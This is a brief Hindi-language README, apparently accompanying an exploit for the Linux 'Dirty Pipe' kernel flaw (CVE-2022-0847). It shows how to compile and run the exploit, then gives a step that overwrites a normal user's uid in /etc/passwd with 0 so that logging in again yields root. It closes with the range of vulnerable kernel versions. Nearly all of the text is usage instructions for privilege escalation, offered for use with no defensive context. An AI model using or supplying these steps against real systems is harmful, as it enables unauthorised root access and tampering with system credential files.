
CVE-2022-0847 (Dirty Pipe) के लिए एक रूट एक्सप्लॉइट
gcc exploit.c -o exploit -std=c99
#
./exploit
Usage: ./exp TARGETFILE OFFSET DATA
# /etc/passwd फ़ाइल में सामान्य उपयोगकर्ता के uid ऑफ़सेट स्थान ढूंढें और uid को 0 में बदलें, फिर पुनः लॉगिन करें और यह रूट विशेषाधिकार होगा।
प्रभाव दायरा
Linux Kernel संस्करण >= 5.8
Linux Kernel संस्करण < 5.16.11 / 5.15.25 / 5.10.102